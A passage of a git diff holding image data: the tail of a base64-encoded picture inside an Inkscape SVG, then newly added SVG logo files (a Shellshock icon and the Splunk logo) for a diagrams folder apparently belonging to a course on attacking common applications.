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 /9k= " + id="image140" + x="-53.107635" + y="43.646523" /></g><g + inkscape:groupmode="layer" + id="layer2" + inkscape:label="Layer 2" + style="display:inline" + transform="translate(-22.812022,-69.167871)"><path + id="path354" + style="display:inline;fill:#f99e1c;fill-opacity:1;stroke-width:0.579967;stroke-linecap:round" + d="m 106.06226,69.167871 c -20.994798,0.0195 -41.206012,7.975948 -56.580009,22.273576 l 14.058057,15.971633 c -0.454135,0.29818 -0.901128,0.6045 -1.345138,0.91416 9.753255,-6.82503 21.369348,-10.485861 33.273421,-10.486184 18.162519,9e-4 34.756089,8.440934 45.516599,22.036894 8.30712,-9.19103 16.74256,-18.51996 23.85384,-26.385465 C 149.24241,77.918644 128.10312,69.170207 106.06226,69.167871 Z" + sodipodi:nodetypes="cccccccc" /><path + id="rect1067" + style="display:inline;fill:#00397e;fill-opacity:1;stroke-width:0.529167;stroke-linecap:round" + d="m 51.266061,122.98857 75.489269,45.42625 -11.58063,10.24832 z" + sodipodi:nodetypes="cccc" /><path + id="rect4931" + style="display:inline;opacity:1;fill:#ee0f6a;fill-opacity:1;stroke:none;stroke-width:0.529;stroke-linecap:round;stroke-dasharray:none" + d="m 41.290476,184.95176 -35.5648869,0.0207 c -2.1420609,12.89114 -8.6130582,24.65879 -18.2900231,33.44095 -6.833865,6.18201 -15.042301,10.64895 -23.944752,13.02916 l 6.203424,31.80685 c 16.525136,-2.30108 31.9660233,-9.49181 44.337377,-20.68666 16.375658,-14.82387 26.183354,-35.54692 27.262531,-57.60921 z" + transform="rotate(-47.853106)" + sodipodi:nodetypes="cccccccc" /><path + id="rect3316" + style="display:inline;fill:#b4cc38;fill-opacity:1;stroke:none;stroke-width:0.529;stroke-linecap:round;stroke-dasharray:none" + d="M 49.492849,91.450987 C 32.516815,107.1787 22.832076,129.23157 22.812022,152.37348 c 0.0037,16.81407 5.164775,33.23277 14.685678,47.09154 l 12.026277,-8.16109 c -7.829525,-10.14688 -12.138429,-22.60003 -12.14695,-35.41645 0.01993,-19.52826 9.849303,-37.74705 26.173331,-48.46521 z" + sodipodi:nodetypes="ccccccc" /></g></svg> diff --git a/public/diagrams/attacking-common-applications/shellshock.svg b/public/diagrams/attacking-common-applications/shellshock.svg @@ -0,0 +1 @@ +<svg height="307.488" width="288.32" xmlns="http://www.w3.org/2000/svg"><path d="M18.057 0c-.536-.036-1.364.156-1.932.667s-.756 1.093-.833 1.5c-.152.812-.037 1.229.068 1.666.208.88.561 1.787 1.099 3 1.072 2.422 2.869 5.886 5.432 10.531 16.697 30.297 28.682 52.25 36.401 66.605 3.859 7.171 6.667 12.432 8.432 15.895.079.157.093.193.167.333-.495-.15-.776-.224-1.334-.394a951.977 951.977 0 0 1-14.234-4.606A972.244 972.244 0 0 0 36.989 90.6a357.152 357.152 0 0 0-4.598-1.402c-.574-.166-1.027-.301-1.402-.394a8.674 8.674 0 0 0-.53-.136c-.167-.031-.11-.115-.834-.068-.516.037-1.765.932-1.765.932 0 .005-.516 1.078-.537 1.401-.031.647.078.813.136.97.109.311.166.415.234.53.13.235.266.417.432.667.334.505.812 1.172 1.432 2.037a545.943 545.943 0 0 0 5.334 7.197c4.51 6.016 10.745 14.219 17.536 23.068 13.578 17.698 29.302 37.932 37.568 48.167 22.912 28.364 49.494 71.13 49.494 71.13 1.626 2.766 5.787.422 4.271-2.395 0 0-.099-.199-.104-.204-.093-.192-3.959-7.828-8.063-15.932-4.156-8.203-8.4-16.531-9.066-17.803v-.03c-4.642-8.531-15.772-30.407-25.636-50.167A3204.58 3204.58 0 0 1 87.989 132a704.594 704.594 0 0 1-3.296-6.833c3.495 1.328 11.656 4.036 19.364 6.5a633.502 633.502 0 0 0 10.47 3.265c1.421.428 2.629.787 3.53 1.037.454.119.818.192 1.136.266.156.036.307.072.463.098.15.027.27.094.735.068h.036a2.692 2.692 0 0 0 1.562-.734c.47-.47.647-1.006.704-1.364.11-.724 0-.97-.068-1.167-.125-.407-.229-.543-.333-.735a16.666 16.666 0 0 0-.803-1.302c-.672-.995-1.65-2.348-2.901-4.031-2.495-3.365-6.052-7.948-10.061-13-7.986-10.057-23.866-30.333-35.272-45C61.839 54.38 49.36 38.547 45.42 33.735 41.615 29.073 35.22 20.63 31.323 15.13 28 10.437 25.364 6.89 23.39 4.464c-.99-1.213-1.798-2.13-2.5-2.833a9.761 9.761 0 0 0-1.068-.934c-.37-.27-.692-.629-1.766-.697zM124.26 58.068c-7.453-.032-13.87 2.687-18.87 6.03a6.405 6.405 0 1 0 7.137 10.637c3.484-2.334 7.312-3.886 11.666-3.866 3.916.016 8.504 1.267 14.099 5.199v42.296a6.4 6.4 0 1 0 12.801 0v-43.03c4.99-3.323 9.172-4.454 12.834-4.47 4.36-.015 8.286 1.537 11.797 3.87 4.74 3.146 8.276 7.531 10.099 10.069l-18.162 42.265a6.392 6.392 0 0 0 3.303 8.536 6.399 6.399 0 0 0 8.463-3.505l18.396-42.796c9.552-1.344 16.13-.33 20.636 1.598 5.088 2.172 7.926 5.484 9.869 9.364 2.38 4.766 2.975 10.204 3.063 13.704l-32.198 32.198c-6.272 6.046 3.047 15.322 9.067 9.036l30.13-30.135c10.137 2.265 15.97 5.85 19.37 9.53 3.61 3.923 4.839 8.173 5 12.705.213 6.186-1.932 12.328-3.333 15.629l-43.234 25.803a6.404 6.404 0 0 0-2.261 8.806 6.403 6.403 0 0 0 8.828 2.194l40.396-24.136c12.672 7.874 13.35 15.781 12.104 23.204-1.203 7.156-5.025 12.536-5.77 13.566l-58.031 33.495a6.401 6.401 0 0 0-3.199 5.537v32.13l-32.536.333 13.568-10.932a6.393 6.393 0 0 0 1.276-9.219 6.398 6.398 0 0 0-9.276-.744l-37.13 29.895-37.135-29.895a6.4 6.4 0 0 0-4.136-1.469c-6.052.052-8.656 7.697-3.896 11.432l13.562 10.937-32.53-.333v-32.135a6.408 6.408 0 0 0-3.199-5.532L18.76 212.333c-.776-1.073-4.541-6.412-5.733-13.53-1.204-7.158-.548-14.772 10.864-22.371l38.969 23.303c3.041 1.849 7 .864 8.828-2.194a6.405 6.405 0 0 0-2.261-8.806L29.89 165.136c-.438-.839-4.667-9.224-4.364-17.833.161-4.532 1.385-8.782 5-12.704 4.041-4.235.738-11.224-5.1-10.796a6.406 6.406 0 0 0-4.302 2.129c-5.901 6.401-8.156 14.115-8.401 20.937-.27 7.762 1.697 14.407 3.5 18.964-.068.219-.12.443-.167.667-14.041 10.203-17.39 23.921-15.63 34.401 1.964 11.714 8.766 20.167 8.766 20.167a6.37 6.37 0 0 0 1.834 1.568l56.202 32.463v34.77a6.397 6.397 0 0 0 6.334 6.396l53.432.538c.489.009.984-.032 1.464-.136l11.666 9.401a6.402 6.402 0 0 0 8.036 0l11.667-9.401c.479.104.975.145 1.464.136l53.437-.538a6.4 6.4 0 0 0 6.334-6.396V255.1l56.234-32.463a6.478 6.478 0 0 0 1.834-1.568s6.796-8.453 8.765-20.167c1.77-10.562-1.661-24.437-16-34.666 1.839-4.568 3.948-11.38 3.667-19.366-.24-6.822-2.5-14.536-8.402-20.937-5.052-5.473-12.677-9.735-23-12.5-.082-4.781-.838-11.776-4.401-18.896-3-6.005-8.23-11.968-16.265-15.4-7.156-3.063-16.38-3.99-27.766-2.37-2.317-3.334-6.089-8.178-12.901-12.698-5.036-3.344-11.479-6.032-18.932-6-6.245.025-12.99 2.197-19.765 6.63-6.86-4.427-13.62-6.605-19.871-6.63z" fill="#b50000"/></svg> +\ No newline at end of file diff --git a/public/diagrams/attacking-common-applications/splunk.svg b/public/diagrams/attacking-common-applications/splunk.svg @@ -0,0 +1,15 @@ +<?xml version="1.0" encoding="UTF-8"?> +<svg fill="none" version="1.1" viewBox="0 0 122 36" xmlns="http://www.w3.org/2000/svg" xmlns:cc="http://creativecommons.org/ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> +<title>Splunk logo</title> + <metadata> + <rdf:RDF> + <cc:Work rdf:about=""> + <dc:format>image/svg+xml</dc:format> + <dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/> + <dc:title/> + </cc:Work> + </rdf:RDF> + </metadata> + <desc>An information technology company based in California, United States</desc> + <path d="m12.93 21.8c0 0.8019-0.1696 1.547-0.5088 2.236-0.3392 0.6793-0.8198 1.264-1.423 1.736-0.6125 0.4811-1.338 0.849-2.177 1.113-0.8386 0.2641-1.762 0.3962-2.761 0.3962-1.197 0-2.271-0.1604-3.213-0.4905-0.9423-0.3208-1.894-0.868-2.846-1.623l1.574-2.557c0.7538 0.6321 1.432 1.094 2.045 1.387 0.6031 0.2925 1.225 0.434 1.866 0.434 0.7821 0 1.404-0.1982 1.885-0.6038 0.4806-0.4057 0.7067-0.9434 0.7067-1.632 0-0.2924-0.04712-0.566-0.1319-0.8207-0.08481-0.2548-0.245-0.5189-0.4711-0.7925-0.2262-0.2641-0.5465-0.566-0.9517-0.8773-0.3958-0.3114-0.914-0.7076-1.555-1.17-0.4806-0.3396-0.9611-0.6981-1.423-1.057-0.4617-0.3679-0.8763-0.7547-1.263-1.17-0.3769-0.4151-0.6784-0.8773-0.914-1.396-0.2262-0.5094-0.3486-1.104-0.3486-1.755 0-0.7547 0.1602-1.453 0.4711-2.076s0.7444-1.151 1.291-1.594c0.5465-0.4434 1.197-0.783 1.969-1.028 0.7632-0.2453 1.592-0.3679 2.497-0.3679 0.9517 0 1.866 0.1226 2.751 0.3774 0.8857 0.2547 1.706 0.6226 2.469 1.113l-1.423 2.302c-0.9705-0.6793-1.998-1.028-3.072-1.028-0.6502 0-1.197 0.1698-1.621 0.5094s-0.6408 0.7642-0.6408 1.283c0 0.4906 0.1885 0.934 0.5654 1.321 0.3769 0.3962 1.027 0.934 1.951 1.651 0.9329 0.6793 1.706 1.283 2.309 1.792 0.6125 0.5094 1.093 1 1.451 1.453 0.3581 0.4529 0.5937 0.9057 0.735 1.377 0.1413 0.4811 0.2073 0.9905 0.2073 1.557zm16.16-4.311c0 0.7075-0.0754 1.472-0.2261 2.292-0.1414 0.8208-0.3958 1.576-0.7538 2.274-0.3581 0.6981-0.8198 1.274-1.395 1.717-0.5748 0.4528-1.31 0.6792-2.186 0.6792-1.47 0-2.629-0.5849-3.477-1.764-0.8481-1.17-1.272-2.783-1.272-4.83 0-2.104 0.424-3.764 1.291-5 0.8575-1.236 2.026-1.849 3.496-1.849 1.395 0 2.497 0.5849 3.307 1.736 0.8104 1.16 1.216 2.745 1.216 4.745zm5.107-0.1793c0-1.368-0.1979-2.613-0.5842-3.726-0.3958-1.123-0.9423-2.085-1.668-2.896-0.7255-0.8113-1.574-1.434-2.563-1.887s-2.082-0.6792-3.279-0.6792c-1.319 0-2.478 0.2547-3.477 0.7453-0.9988 0.5-1.932 1.283-2.78 2.358l-0.0282-2.67h-4.702v27.44h4.693v-11.59c0.4617 0.5377 0.9045 0.9905 1.338 1.358 0.424 0.3679 0.8575 0.6698 1.3 0.8962 0.4428 0.2264 0.9045 0.3962 1.394 0.4906 0.49 0.0943 1.018 0.1415 1.574 0.1415 1.244 0 2.412-0.2548 3.486-0.7453 1.074-0.5 2.007-1.198 2.789-2.104s1.395-1.962 1.838-3.16c0.4523-1.208 0.669-2.538 0.669-3.972zm2.092 9.538h4.824v-26.85h-4.824v26.85zm25.4 0.0094v-18.32h-4.824v9.858c0 0.8774-0.0377 1.557-0.1131 2.038-0.0754 0.4811-0.1979 0.9056-0.3675 1.302-0.6784 1.509-1.932 2.274-3.75 2.274-1.423 0-2.412-0.5094-2.978-1.538-0.2261-0.3868-0.3769-0.8302-0.4617-1.321-0.0848-0.4905-0.1319-1.198-0.1319-2.132v-10.48h-4.824v10.41c0 0.7075 0.0094 1.311 0.0189 1.792 0.0094 0.4811 0.0471 0.9245 0.0942 1.302 0.0471 0.3774 0.1036 0.717 0.1696 1.01 0.0565 0.2924 0.1508 0.5754 0.2733 0.8396 0.4428 1.123 1.15 1.972 2.139 2.547 0.9894 0.5754 2.205 0.8585 3.637 0.8585 1.291 0 2.431-0.2265 3.411-0.6793s1.932-1.189 2.855-2.217l0.0094 2.453 4.843 0.0094zm20.79-0.0094v-10.39c0-0.7076-0.0094-1.311-0.0189-1.811-0.0094-0.5-0.0376-0.9339-0.0942-1.302-0.0471-0.368-0.113-0.6887-0.179-0.9623-0.0754-0.283-0.1602-0.5566-0.2544-0.8208-0.4429-1.094-1.15-1.943-2.139-2.538s-2.205-0.8962-3.647-0.8962c-1.291 0-2.431 0.2264-3.411 0.6792s-1.932 1.198-2.855 2.217l-0.0094-2.453h-4.853v18.28h4.862v-9.868c0-0.8491 0.0283-1.519 0.0942-1.991 0.0565-0.4717 0.1791-0.9151 0.3487-1.34 0.3109-0.7359 0.8009-1.283 1.451-1.66s1.423-0.566 2.327-0.566c1.423 0 2.412 0.5094 2.978 1.538 0.2168 0.3868 0.3675 0.8302 0.4523 1.311 0.0848 0.4812 0.1319 1.198 0.1319 2.123v10.43l4.815 0.0095zm19.96-1.208-7.349-9.142 6.209-6.66-3.656-1.575-6.464 7.5h-0.5088v-15.76h-4.862v26.85h4.862v-9.726l7.274 10.09 4.494-1.576zm18.79-6.566v-2.991l-14.62-7.34v3.292l11.33 5.519-11.33 5.594v3.217l14.62-7.292zm-13.2-15.08c-0.895 0-1.621 0.7358-1.621 1.642 0 0.9245 0.726 1.651 1.621 1.651 0.905 0 1.621-0.7264 1.621-1.651 0-0.9151-0.716-1.642-1.621-1.642zm0.01 0.2547c0.725 0 1.309 0.6226 1.309 1.396 0 0.7736-0.584 1.396-1.309 1.387-0.735 0-1.32-0.6132-1.32-1.396 0-0.7642 0.585-1.387 1.32-1.387zm-0.311 1.557h0.197c0.236 0 0.349 0.08491 0.396 0.3208 0.038 0.2453 0.085 0.4057 0.123 0.4623h0.311c-0.029-0.0566-0.076-0.1698-0.113-0.4528-0.038-0.2736-0.142-0.4151-0.311-0.4434v-0.01888c0.198-0.0566 0.358-0.2075 0.358-0.4434 